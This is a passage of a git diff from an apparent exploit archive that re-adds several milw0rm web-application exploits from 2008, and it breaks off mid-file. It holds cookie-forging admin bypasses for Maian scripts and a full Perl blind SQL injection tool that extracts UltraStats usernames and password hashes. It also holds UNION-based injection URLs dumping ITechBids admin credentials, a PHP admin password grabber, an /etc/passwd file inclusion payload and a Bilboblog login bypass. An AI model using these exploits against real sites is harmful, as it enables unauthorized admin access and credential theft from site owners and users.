+[*] DORK: Powered by Maian Weblog v4.0
+
+
+
+[*] Vendor Has Not Been Notified!
+
+
+
+[*] DESCRIPTION:
+
+ Maian Weblog suffers from a insecure cookie, the admin panel only checks if the cookie
+
+exists.
+ and not the content. so we can easyily craft a cookie and look like a admin.
+
+
+
+[*] Vulnerability:
+
+ javascript:document.cookie = "weblog_cookie=1; path=/";
+
+
+[*] NOTE/TIP:
+
+ after running the javascript, visit "/admin/index.php" to view admin area.
+
+
+
+-[*]+================================================================================+[*]-
+-[*]+ Maian Weblog <= v4.0 Insecure Cookie Handling Vulnerability +[*]-
+-[*]+================================================================================+[*]-
+
+# milw0rm.com [2008-07-13]
diff --git a/platforms/php/webapps/6065.txt b/platforms/php/webapps/6065.txt
index ec36378cf..cd8e6f362 100755
--- a/platforms/php/webapps/6065.txt
+++ b/platforms/php/webapps/6065.txt
@@ -1,42 +1,42 @@
--[*]+================================================================================+[*]-
--[*]+ Maian Uploader <= v4.0 Insecure Cookie Handling Vulnerability +[*]-
--[*]+================================================================================+[*]-
-
-
-
-[*] Discovered By: S.W.A.T.
-[*] E-Mail: svvateam[at]yahoo[dot]com
-[*] Script Download: http://www.maianscriptworld.co.uk
-[*] DORK: Powered by: Maian Uploader v4.0
-
-
-
-[*] Vendor Has Not Been Notified!
-
-
-
-[*] DESCRIPTION:
-
- Maian Uploader suffers from a insecure cookie, the admin panel only checks if the cookie
-
-exists.
- and not the content. so we can easyily craft a cookie and look like a admin.
-
-
-
-[*] Vulnerability:
-
- javascript:document.cookie = "uploader_cookie=1; path=/";
-
-
-[*] NOTE/TIP:
-
- after running the javascript, visit "/admin/index.php" to view admin area.
-
-
-
--[*]+================================================================================+[*]-
--[*]+ Maian Uploader <= v4.0 Insecure Cookie Handling Vulnerability +[*]-
--[*]+================================================================================+[*]-
-
-# milw0rm.com [2008-07-13]
+-[*]+================================================================================+[*]-
+-[*]+ Maian Uploader <= v4.0 Insecure Cookie Handling Vulnerability +[*]-
+-[*]+================================================================================+[*]-
+
+
+
+[*] Discovered By: S.W.A.T.
+[*] E-Mail: svvateam[at]yahoo[dot]com
+[*] Script Download: http://www.maianscriptworld.co.uk
+[*] DORK: Powered by: Maian Uploader v4.0
+
+
+
+[*] Vendor Has Not Been Notified!
+
+
+
+[*] DESCRIPTION:
+
+ Maian Uploader suffers from a insecure cookie, the admin panel only checks if the cookie
+
+exists.
+ and not the content. so we can easyily craft a cookie and look like a admin.
+
+
+
+[*] Vulnerability:
+
+ javascript:document.cookie = "uploader_cookie=1; path=/";
+
+
+[*] NOTE/TIP:
+
+ after running the javascript, visit "/admin/index.php" to view admin area.
+
+
+
+-[*]+================================================================================+[*]-
+-[*]+ Maian Uploader <= v4.0 Insecure Cookie Handling Vulnerability +[*]-
+-[*]+================================================================================+[*]-
+
+# milw0rm.com [2008-07-13]
diff --git a/platforms/php/webapps/6066.txt b/platforms/php/webapps/6066.txt
index a8005d991..5c03ceee0 100755
--- a/platforms/php/webapps/6066.txt
+++ b/platforms/php/webapps/6066.txt
@@ -1,42 +1,42 @@ --[*]+================================================================================+[*]- --[*]+ Maian Search <= v1.1 Insecure Cookie Handling Vulnerability +[*]- --[*]+================================================================================+[*]- - - - -[*] Discovered By: S.W.A.T. -[*] E-Mail: svvateam[at]yahoo[dot]com -[*] Script Download: http://www.maianscriptworld.co.uk -[*] DORK: Powered by: Maian Search v1.1 - - - -[*] Vendor Has Not Been Notified! - - - -[*] DESCRIPTION: - - Maian Search suffers from a insecure cookie, the admin panel only checks if the cookie - -exists. - and not the content. so we can easyily craft a cookie and look like a admin. - - - -[*] Vulnerability: - - javascript:document.cookie = "search_cookie=1; path=/"; - - -[*] NOTE/TIP: - - after running the javascript, visit "/admin/index.php" to view admin area. - - - --[*]+================================================================================+[*]- --[*]+ Maian Search <= v1.1 Insecure Cookie Handling Vulnerability +[*]- --[*]+================================================================================+[*]- - -# milw0rm.com [2008-07-13] +-[*]+================================================================================+[*]- +-[*]+ Maian Search <= v1.1 Insecure Cookie Handling Vulnerability +[*]- +-[*]+================================================================================+[*]- + + + +[*] Discovered By: S.W.A.T. +[*] E-Mail: svvateam[at]yahoo[dot]com +[*] Script Download: http://www.maianscriptworld.co.uk +[*] DORK: Powered by: Maian Search v1.1 + + + +[*] Vendor Has Not Been Notified! + + + +[*] DESCRIPTION: + + Maian Search suffers from a insecure cookie, the admin panel only checks if the cookie + +exists. + and not the content. so we can easyily craft a cookie and look like a admin. 
+ + + +[*] Vulnerability: + + javascript:document.cookie = "search_cookie=1; path=/"; + + +[*] NOTE/TIP: + + after running the javascript, visit "/admin/index.php" to view admin area. + + + +-[*]+================================================================================+[*]- +-[*]+ Maian Search <= v1.1 Insecure Cookie Handling Vulnerability +[*]- +-[*]+================================================================================+[*]- + +# milw0rm.com [2008-07-13] diff --git a/platforms/php/webapps/6067.pl b/platforms/php/webapps/6067.pl index 7e745a6da..cc07c2bbe 100755 --- a/platforms/php/webapps/6067.pl +++ b/platforms/php/webapps/6067.pl 
@@ -1,226 +1,226 @@ -#!/usr/bin/perl -use LWP::UserAgent; -use Getopt::Long; - -# -# [!] Discovered.: DNX -# [!] Vendor.....: http://www.shooter-szene.de | http://www.ultrastats.org -# [!] Detected...: 29.06.2008 -# [!] Reported...: 04.07.2008 -# [!] Response...: xx.xx.2008 -# -# [!] Background.: UltraStats is a very flexable log analyzing tool for Call of Duty 2 Server logfiles. -# It is able to parse and consolidate the information it can gather from these logs, -# and put them into a MySQL Database with a very efficient and high optimiced database -# layout. -# -# [!] Bug........: $_GET['id'] in players-detail.php near line 52 -# -# 36: if ( isset($_GET['id']) ) -# 37: { -# 38: // get and check -# 39: $content['playerguid'] = DB_RemoveBadChars($_GET['id']); -# -# 52: $sqlquery = "SELECT " . -# 53: "sum( " .STATS_ALIASES . ".Count) as Count, " . -# 54: STATS_ALIASES . ".Alias as Aliases_Alias, " . -# 55: STATS_ALIASES . ".AliasAsHtml as Aliases_AliasAsHtml" . -# 56: " FROM " . STATS_ALIASES . -# 57: " WHERE PLAYERID = " . $content['playerguid'] . " " . -# 58: GetCustomServerWhereQuery(STATS_ALIASES, false) . -# 59: " GROUP BY " . STATS_ALIASES . ".Alias " . -# 60: " ORDER BY Count DESC"; -# -# [!] Tested on..: v0.2.136, v0.2.142 -# -# [!] Solution...: no update from vendor till now -# -# [!] Quick fix..: in players-detail.php line 39: -# -# - replace: -# $content['playerguid'] = DB_RemoveBadChars($_GET['id']); -# -# - with: -# $content['playerguid'] = intval(DB_RemoveBadChars($_GET['id'])); -# - -if(!$ARGV[1]) -{ - print "\n \\#'#/ "; - print "\n (-.-) "; - print "\n --------------------------oOO---(_)---OOo--------------------------"; - print "\n | Ultrastats <= v0.2.142 (players-detail.php) Blind SQL Injection |"; - print "\n | coded by DNX |"; - print "\n ------------------------------------------------------------------"; - print "\n[!] Usage: perl ultrastats.pl [Host] [Path] "; - print "\n[!] 
Example: perl ultrastats.pl 127.0.0.1 /ultrastats/ -o 2 -i 123 -l 2 -t users"; - print "\n[!] Options:"; - print "\n -o [no] 1 = username (default)"; - print "\n 2 = password"; - print "\n 3 = find database prefix (error based)"; - print "\n -i [no] Valid GUID, default is 1"; - print "\n -l [no] Limitation in sql query, -l 0 shows the first row,"; - print "\n -l 1 the second one and so on, default is 0"; - print "\n -t [name] Changed the user table name, default is stats_users"; - print "\n -p [ip:port] Proxy support"; - print "\n"; - exit; -} - -my $host = $ARGV[0]; -my $path = $ARGV[1]; -my $target = "username"; -my $user = 1; -my $limit = 0; -my $table = "stats_users"; -my %options = (); -GetOptions(\%options, "o=i", "i=i", "l=i", "t=s", "p=s"); - -print "[!] Exploiting...\n"; - -if($options{"i"}) -{ - $user = $options{"i"}; -} - -if($options{"l"}) -{ - $limit = $options{"l"}; -} - -if($options{"t"}) -{ - $table = $options{"t"}; -} - -if($options{"o"} == 1) -{ - $target = "username"; - get_username(); -} -elsif($options{"o"} == 2) -{ - $target = "password"; - get_password(); -} -elsif($options{"o"} == 3) -{ - get_prefix(); -} - -sub get_username() -{ - syswrite(STDOUT, "[!] Username: ", 14); - for(my $i = 1; $i <= 32; $i++) - { - my $found = 0; - my $h = 48; - while(!$found && $h <= 57) - { - if(istrue2($host, $path, $table, $i, $h)) - { - $found = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - if(!$found) - { - $h = 64; - while(!$found && $h <= 122) - { - if(istrue2($host, $path, $table, $i, $h)) - { - $found = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - } - } -} - -sub get_password() -{ - syswrite(STDOUT, "[!] 
MD5-Hash: ", 14); - for(my $i = 1; $i <= 32; $i++) - { - my $found = 0; - my $h = 48; - while(!$found && $h <= 57) - { - if(istrue2($host, $path, $table, $i, $h)) - { - $found = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - if(!$found) - { - $h = 97; - while(!$found && $h <= 102) - { - if(istrue2($host, $path, $table, $i, $h)) - { - $found = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - } - } -} - -sub get_prefix() -{ - my $ua = LWP::UserAgent->new; - my $url = "http://".$host.$path."players-detail.php?id=".$user."'"; - - if($options{"p"}) - { - $ua->proxy('http', "http://".$options{"p"}); - } - - my $response = $ua->get($url); - my $content = $response->content; - - $content =~ /^Database error: Invalid SQL: SELECT sum\( (.*?)_aliases.Count\) as Count,/; - print "[!] Prefix: ".$1; -} - -print "\n[!] Exploit done\n"; - -sub istrue2 -{ - my $host = shift; - my $path = shift; - my $table = shift; - my $i = shift; - my $h = shift; - - my $ua = LWP::UserAgent->new; - my $url = "http://".$host.$path."players-detail.php?id=".$user."%20AND%20SUBSTRING((SELECT%20".$target."%20FROM%20".$table."%20LIMIT%20".$limit.",1),".$i.",1)=CHAR(".$h.")"; - - if($options{"p"}) - { - $ua->proxy('http', "http://".$options{"p"}); - } - - my $response = $ua->get($url); - my $content = $response->content; - - my $regexp = "Top Hitlocations where you got killed by others"; - my $regexp2 = "Meist genutzte Aliases"; - - if($content =~ /$regexp/ || $content =~ /$regexp2/) - { - return 1; - } - else - { - return 0; - } -} - -# milw0rm.com [2008-07-13] +#!/usr/bin/perl +use LWP::UserAgent; +use Getopt::Long; + +# +# [!] Discovered.: DNX +# [!] Vendor.....: http://www.shooter-szene.de | http://www.ultrastats.org +# [!] Detected...: 29.06.2008 +# [!] Reported...: 04.07.2008 +# [!] Response...: xx.xx.2008 +# +# [!] Background.: UltraStats is a very flexable log analyzing tool for Call of Duty 2 Server logfiles. 
+# It is able to parse and consolidate the information it can gather from these logs, +# and put them into a MySQL Database with a very efficient and high optimiced database +# layout. +# +# [!] Bug........: $_GET['id'] in players-detail.php near line 52 +# +# 36: if ( isset($_GET['id']) ) +# 37: { +# 38: // get and check +# 39: $content['playerguid'] = DB_RemoveBadChars($_GET['id']); +# +# 52: $sqlquery = "SELECT " . +# 53: "sum( " .STATS_ALIASES . ".Count) as Count, " . +# 54: STATS_ALIASES . ".Alias as Aliases_Alias, " . +# 55: STATS_ALIASES . ".AliasAsHtml as Aliases_AliasAsHtml" . +# 56: " FROM " . STATS_ALIASES . +# 57: " WHERE PLAYERID = " . $content['playerguid'] . " " . +# 58: GetCustomServerWhereQuery(STATS_ALIASES, false) . +# 59: " GROUP BY " . STATS_ALIASES . ".Alias " . +# 60: " ORDER BY Count DESC"; +# +# [!] Tested on..: v0.2.136, v0.2.142 +# +# [!] Solution...: no update from vendor till now +# +# [!] Quick fix..: in players-detail.php line 39: +# +# - replace: +# $content['playerguid'] = DB_RemoveBadChars($_GET['id']); +# +# - with: +# $content['playerguid'] = intval(DB_RemoveBadChars($_GET['id'])); +# + +if(!$ARGV[1]) +{ + print "\n \\#'#/ "; + print "\n (-.-) "; + print "\n --------------------------oOO---(_)---OOo--------------------------"; + print "\n | Ultrastats <= v0.2.142 (players-detail.php) Blind SQL Injection |"; + print "\n | coded by DNX |"; + print "\n ------------------------------------------------------------------"; + print "\n[!] Usage: perl ultrastats.pl [Host] [Path] "; + print "\n[!] Example: perl ultrastats.pl 127.0.0.1 /ultrastats/ -o 2 -i 123 -l 2 -t users"; + print "\n[!] 
Options:"; + print "\n -o [no] 1 = username (default)"; + print "\n 2 = password"; + print "\n 3 = find database prefix (error based)"; + print "\n -i [no] Valid GUID, default is 1"; + print "\n -l [no] Limitation in sql query, -l 0 shows the first row,"; + print "\n -l 1 the second one and so on, default is 0"; + print "\n -t [name] Changed the user table name, default is stats_users"; + print "\n -p [ip:port] Proxy support"; + print "\n"; + exit; +} + +my $host = $ARGV[0]; +my $path = $ARGV[1]; +my $target = "username"; +my $user = 1; +my $limit = 0; +my $table = "stats_users"; +my %options = (); +GetOptions(\%options, "o=i", "i=i", "l=i", "t=s", "p=s"); + +print "[!] Exploiting...\n"; + +if($options{"i"}) +{ + $user = $options{"i"}; +} + +if($options{"l"}) +{ + $limit = $options{"l"}; +} + +if($options{"t"}) +{ + $table = $options{"t"}; +} + +if($options{"o"} == 1) +{ + $target = "username"; + get_username(); +} +elsif($options{"o"} == 2) +{ + $target = "password"; + get_password(); +} +elsif($options{"o"} == 3) +{ + get_prefix(); +} + +sub get_username() +{ + syswrite(STDOUT, "[!] Username: ", 14); + for(my $i = 1; $i <= 32; $i++) + { + my $found = 0; + my $h = 48; + while(!$found && $h <= 57) + { + if(istrue2($host, $path, $table, $i, $h)) + { + $found = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + if(!$found) + { + $h = 64; + while(!$found && $h <= 122) + { + if(istrue2($host, $path, $table, $i, $h)) + { + $found = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + } + } +} + +sub get_password() +{ + syswrite(STDOUT, "[!] 
MD5-Hash: ", 14); + for(my $i = 1; $i <= 32; $i++) + { + my $found = 0; + my $h = 48; + while(!$found && $h <= 57) + { + if(istrue2($host, $path, $table, $i, $h)) + { + $found = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + if(!$found) + { + $h = 97; + while(!$found && $h <= 102) + { + if(istrue2($host, $path, $table, $i, $h)) + { + $found = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + } + } +} + +sub get_prefix() +{ + my $ua = LWP::UserAgent->new; + my $url = "http://".$host.$path."players-detail.php?id=".$user."'"; + + if($options{"p"}) + { + $ua->proxy('http', "http://".$options{"p"}); + } + + my $response = $ua->get($url); + my $content = $response->content; + + $content =~ /^Database error: Invalid SQL: SELECT sum\( (.*?)_aliases.Count\) as Count,/; + print "[!] Prefix: ".$1; +} + +print "\n[!] Exploit done\n"; + +sub istrue2 +{ + my $host = shift; + my $path = shift; + my $table = shift; + my $i = shift; + my $h = shift; + + my $ua = LWP::UserAgent->new; + my $url = "http://".$host.$path."players-detail.php?id=".$user."%20AND%20SUBSTRING((SELECT%20".$target."%20FROM%20".$table."%20LIMIT%20".$limit.",1),".$i.",1)=CHAR(".$h.")"; + + if($options{"p"}) + { + $ua->proxy('http', "http://".$options{"p"}); + } + + my $response = $ua->get($url); + my $content = $response->content; + + my $regexp = "Top Hitlocations where you got killed by others"; + my $regexp2 = "Meist genutzte Aliases"; + + if($content =~ /$regexp/ || $content =~ /$regexp2/) + { + return 1; + } + else + { + return 0; + } +} + +# milw0rm.com [2008-07-13] diff --git a/platforms/php/webapps/6068.txt b/platforms/php/webapps/6068.txt index a463c75b1..5a157dd30 100755 --- a/platforms/php/webapps/6068.txt +++ b/platforms/php/webapps/6068.txt 
@@ -1,60 +1,60 @@ -================================================= - MFORUM 0.1a Arbitrary Add-Admin Vulnerability -================================================= - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - -AUTHOR : CWH Underground -DATE : 13 July 2008 -SITE : cwh.citec.us - - -################################################################################### -APPLICATION : MFORUM -VERSION : 0.1a -DOWNLOAD : http://downloads.sourceforge.net/marcioforum/mforum.zip -################################################################################### - - ---- Add-Admin Exploit --- - -***magic_quotes_gpc = off*** - -------------- - Description -------------- - - MFORUM 0.1a has Vulnerability to escalate user's privilege to administartor's privilege. -That Vulnerable in "Control Panel - Edit your profile" (http://[Target]/[mforum_path]/usercp.php?mode=edit_profile) -and you can injection code into various field (City, Interest, Email, Icq, msn, Yahoo Messenger). - - This action will give your account can use Admin Control Panel (http://[Target]/[mforum_path]/admin/index.php) -with Administrative's Privilege. 
- ------------------ - Vulnerable Path ------------------ -[+] http://[target]/[mforum_path]/usercp.php?mode=edit_profile - --------------- - Exploit code --------------- -[+] hacked", type="2 - - -##################################################################### - Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos - Special Thx : asylu3, str0ke, citec.us, milw0rm.com -##################################################################### - -# milw0rm.com [2008-07-13] +================================================= + MFORUM 0.1a Arbitrary Add-Admin Vulnerability +================================================= + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground Hacking Team .. + `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + +AUTHOR : CWH Underground +DATE : 13 July 2008 +SITE : cwh.citec.us + + +################################################################################### +APPLICATION : MFORUM +VERSION : 0.1a +DOWNLOAD : http://downloads.sourceforge.net/marcioforum/mforum.zip +################################################################################### + + +--- Add-Admin Exploit --- + +***magic_quotes_gpc = off*** + +------------- + Description +------------- + + MFORUM 0.1a has Vulnerability to escalate user's privilege to administartor's privilege. +That Vulnerable in "Control Panel - Edit your profile" (http://[Target]/[mforum_path]/usercp.php?mode=edit_profile) +and you can injection code into various field (City, Interest, Email, Icq, msn, Yahoo Messenger). + + This action will give your account can use Admin Control Panel (http://[Target]/[mforum_path]/admin/index.php) +with Administrative's Privilege. 
+ +----------------- + Vulnerable Path +----------------- +[+] http://[target]/[mforum_path]/usercp.php?mode=edit_profile + +-------------- + Exploit code +-------------- +[+] hacked", type="2 + + +##################################################################### + Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos + Special Thx : asylu3, str0ke, citec.us, milw0rm.com +##################################################################### + +# milw0rm.com [2008-07-13] diff --git a/platforms/php/webapps/6069.txt b/platforms/php/webapps/6069.txt index 4605ec132..ebd566f58 100755 --- a/platforms/php/webapps/6069.txt +++ b/platforms/php/webapps/6069.txt 
@@ -1,56 +1,56 @@ -######## ## ## ###### ######## ## ## ######## ######## ####### ######## -## ### ## ## ## ## ## ## ## ## ## ## ## ## ## ## -## #### ## ## ## ## #### ## ## ## ## ## ## -###### ## ## ## ## ######## ## ######## ## ####### ## ## -## ## #### ## ## ## ## ## ## ## ## ## -## ## ### ## ## ## ## ## ## ## ## ## ## ## -######## ## ## ###### ## ## ## ## ## ####### ######## - -################################ !R4Q!4N H4CK3R ################################### - -ITechBids 7.0 Gold Multiple Remote Vulnerabilities - -Website : http://www.itechscripts.com - -Founded By : Encrypt3d.M!nd - -NOTE:I Didn't Search The Script Well,So Maybe There is other Vulnerabilities. - - -# 1- Cross-site scripting (XSS): - -Affected File : forward_to_friend.php - -PoC : - -/forward_to_friend.php?productid= - - -# 2-Remote Sql Injection(s) : - -Affected File(s) : - -sellers_othersitem.php -classifieds.php -shop.php - -Note:There is Other Files Affected But I Couldn't Exploit Them :( - -PoC: - -/sellers_othersitem.php?seller_id=666666+union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+admin - -/classifieds.php?productid=666666+union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+admin - -/shop.php?id=666666+union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+admin - - -# Greetz: - -MY Sweet,L!0N,EL Mariachi,-=MizO=-(:-L),Shadow Administrator, -KoRn The Dog,Mini-Spider,All My Friends - - -The EnD :D - -# milw0rm.com [2008-07-13] +######## ## ## ###### ######## ## ## ######## ######## ####### ######## +## ### ## ## ## ## ## ## ## ## ## ## ## ## ## ## +## #### ## ## ## ## #### ## ## ## ## ## ## +###### ## ## ## ## ######## ## ######## ## ####### ## ## +## ## #### ## ## ## ## ## ## 
## ## ## +## ## ### ## ## ## ## ## ## ## ## ## ## ## +######## ## ## ###### ## ## ## ## ## ####### ######## + +################################ !R4Q!4N H4CK3R ################################### + +ITechBids 7.0 Gold Multiple Remote Vulnerabilities + +Website : http://www.itechscripts.com + +Founded By : Encrypt3d.M!nd + +NOTE:I Didn't Search The Script Well,So Maybe There is other Vulnerabilities. + + +# 1- Cross-site scripting (XSS): + +Affected File : forward_to_friend.php + +PoC : + +/forward_to_friend.php?productid= + + +# 2-Remote Sql Injection(s) : + +Affected File(s) : + +sellers_othersitem.php +classifieds.php +shop.php + +Note:There is Other Files Affected But I Couldn't Exploit Them :( + +PoC: + +/sellers_othersitem.php?seller_id=666666+union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+admin + +/classifieds.php?productid=666666+union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+admin + +/shop.php?id=666666+union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+admin + + +# Greetz: + +MY Sweet,L!0N,EL Mariachi,-=MizO=-(:-L),Shadow Administrator, +KoRn The Dog,Mini-Spider,All My Friends + + +The EnD :D + +# milw0rm.com [2008-07-13] diff --git a/platforms/php/webapps/6070.php b/platforms/php/webapps/6070.php index f00c4591b..ee4b30a74 100755 --- a/platforms/php/webapps/6070.php +++ b/platforms/php/webapps/6070.php @@ -1,69 +1,69 @@ - -

    Scripteen Free Image Hosting Script V1.2.* (cookie) Admin Password Grabber Exploit

    -

    Coded By RMx - Liz0ziM

    -

    Web:www.biyosecurity.com

    -

    Dork:"Powered by Scripteen Free Image Hosting Script V1.2"

    -
    -

    TARGET HOST: - - Example:www.xxxx.com

    -

    TARGET PATH: -Example:/ or /scriptpath/

    -

    -

    -Sending Exploit..
    '; -$packet ="GET ".$p." HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Cookie: cookid=1\r\n"; -$packet.="Connection: Close\r\n\r\n"; -yolla($host,$packet); -preg_match_all($desen,$veri,$cik); -$ad=$cik[1][0]; -$sifre=$cik[1][1]; -if($ad AND $sifre){ -echo ' -Exploit succeeded...
    -Admin Username:'.$ad.'
    -Admin Password:'.$sifre.'
    '; -} -else -{ -echo 'Exploit Failed !'; -} -} - -?> - -# milw0rm.com [2008-07-13] + +

    Scripteen Free Image Hosting Script V1.2.* (cookie) Admin Password Grabber Exploit

    +

    Coded By RMx - Liz0ziM

    +

    Web:www.biyosecurity.com

    +

    Dork:"Powered by Scripteen Free Image Hosting Script V1.2"

    +
    +

    TARGET HOST: + + Example:www.xxxx.com

    +

    TARGET PATH: +Example:/ or /scriptpath/

    +

    +

    +Sending Exploit..
    '; +$packet ="GET ".$p." HTTP/1.0\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Cookie: cookid=1\r\n"; +$packet.="Connection: Close\r\n\r\n"; +yolla($host,$packet); +preg_match_all($desen,$veri,$cik); +$ad=$cik[1][0]; +$sifre=$cik[1][1]; +if($ad AND $sifre){ +echo ' +Exploit succeeded...
    +Admin Username:'.$ad.'
    +Admin Password:'.$sifre.'
    '; +} +else +{ +echo 'Exploit Failed !'; +} +} + +?> + +# milw0rm.com [2008-07-13] diff --git a/platforms/php/webapps/6071.txt b/platforms/php/webapps/6071.txt index 573f3eb87..4b39d5574 100755 --- a/platforms/php/webapps/6071.txt +++ b/platforms/php/webapps/6071.txt 
@@ -1,28 +1,28 @@ -############################################################################### -# -# Name : CodeDB (list.php lang) Local File Inclusion Vulnerability -# Author : cOndemned -# Greetz : ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;* -# -############################################################################### - -Source : - - // list.php - - 2. $lang = htmlspecialchars($_GET['lang']); // ok, but.... for what ? lol - - 7. if(file_exists('templates/'.$lang.'_middle.php')) // We'll have to cut off rest of filename & extension - 8. include('templates/'.$lang.'_middle.php'); // Ekhm... pwned ;d - - -Proof of Concept : - - http://[host]/[codeDB_path]/list.php?lang=../readme.txt%00 - http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd%00 - http://[host]/[codeDB_path]/list.php?lang=../[local_file]%00 - - -EoF. - -# milw0rm.com [2008-07-14] +############################################################################### +# +# Name : CodeDB (list.php lang) Local File Inclusion Vulnerability +# Author : cOndemned +# Greetz : ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;* +# +############################################################################### + +Source : + + // list.php + + 2. $lang = htmlspecialchars($_GET['lang']); // ok, but.... for what ? lol + + 7. if(file_exists('templates/'.$lang.'_middle.php')) // We'll have to cut off rest of filename & extension + 8. include('templates/'.$lang.'_middle.php'); // Ekhm... pwned ;d + + +Proof of Concept : + + http://[host]/[codeDB_path]/list.php?lang=../readme.txt%00 + http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd%00 + http://[host]/[codeDB_path]/list.php?lang=../[local_file]%00 + + +EoF. + +# milw0rm.com [2008-07-14] diff --git a/platforms/php/webapps/6073.txt b/platforms/php/webapps/6073.txt index fc248e468..56442bddf 100755 --- a/platforms/php/webapps/6073.txt +++ b/platforms/php/webapps/6073.txt 
@@ -1,195 +1,195 @@ - ------------------------------------------------------------------ - - Name : Bilboblog 2.1 Multiples Vulnerabilities - Description : Bilboblog is a small application of micro-blogging in Php / MySQL - Link : http://www.tux-planet.fr/bilboblog-version-021-english-translation/ - - Vuln. types : Login Bypass - Cross Site Scripting - SQL Injection - Full Path Disclosure - - Conditions : - SQL Injection : Magic Quotes Off - - Login Bypass, XSS : Register Globals On - - Credits : Black_H - - ------------------------------------------------------------------ - - - .: I. Login Bypass - ------------------- - - This vulnerability need register_global on. - The file "admin/index.php" (and most of the admin files) includes the file 'login.php' (at line 23) which contains : - - 22| session_start(); - 23| $checkLogin = false; - 24| #echo "toto".$_SESSION['admin_login']; // note: wtf ?? - 25| if(!isset($_SESSION['admin_login'])) { - 26| - 27| # Check form values - 28| if (isset($_POST) && (!empty($_POST['admin_login'])) && (!empty($_POST['admin_passwd'])) ) { - 29| - 30| # Get Session vriables - 31| $admin_login = trim($_POST['admin_login']); - 32| $admin_passwd = trim($_POST['admin_passwd']); - 33| - 34| # Check login - 35| if($admin_login == $login && $admin_passwd == $password) { - 36| $checkLogin = true; - 37| $_SESSION['admin_login'] = $admin_login; - 38| $_SESSION['admin_passwd'] = $admin_passwd; - 39| } - 40| } - 41| - 42| } else { - 43| $checkLogin = true; - 44| } - 45| - 46| 22| if(!$checkLogin) { - 47| - 48| # Print login form - [...] - 58| exit(0); - 59| } - - So, we need the session 'admin_login' ( $_SESSION['admin_login'] ) to have admin rights in all files. The script checks - if we have post good login and pass or not. It's look like good, but if we call directly the login.php file, - the $login and $password variable are not defined. 
We can set them with register_globals on, valid the form with - the same value and so set $_SESSION['admin_login']. - - In facts, go on the page http://site.com/bilboblog/admin/login.php?login=1&password=1 and fill the forms with '1' value - and submit. Because checkLogin is true nothing is printed and you're admin :))) - - - - .: II. Cross Site Scripting - ---------------------------- - - 1) Permanent XSS - - When an admin ( legitim or not :)) ) post an article, the enCode function is applied to the content : - - ---- 'admin/update.php' - - 25| # Check values - 26| if(isset($_POST['content']) && $_POST['content'] != "") { - 27| $content = enCode(substr(trim($_POST['content']), 0, $limit_post)); - [...] - 36| # Insert new content - 37| $sql = "INSERT INTO $db_table VALUES ('', '".time()."', '$content');"; - 38| $result = mysql_query($sql); - - ---- 'admin/function.php' - - 141| function enCode($chaine) { - 142| - [...] // # Youtube & Dailymotion encode url - 145| - 146| # Detect string encoding - 147| $encodage = mb_detect_encoding($chaine); - 148| if($encodage == "ASCII") $encodage = "iso-8859-1"; # Htmlentities unknown ASCII - 149| - 150| # Convert special char to html code - 151| $chaine = htmlentities($chaine,ENT_QUOTES,$encodage); - 152| $chaine = addslashes($chaine); - 153| - 154| # Return result - 155| return $chaine; - 156| } - - The function clean all html chars in the content that we've submit. - It protects the user against XSS in all pages of the blog but in the 'widget.php' file stripslashes() - and html_entity_decode() functions is applied to the content which is printed ! - So je just need to get admin rights (see upper) post malicious code and share widget.php's url to the victim. - - 2) Unpermanents XSS - - The file "index.php" includes the file 'head.php' (at line 21) which contains : - - 44| if ($_SERVER['QUERY_STRING'] != "" && intval($_SERVER['QUERY_STRING']) != "") { - [...] - 55| $titleId = str2Url($liste[2], 100, 0).' 
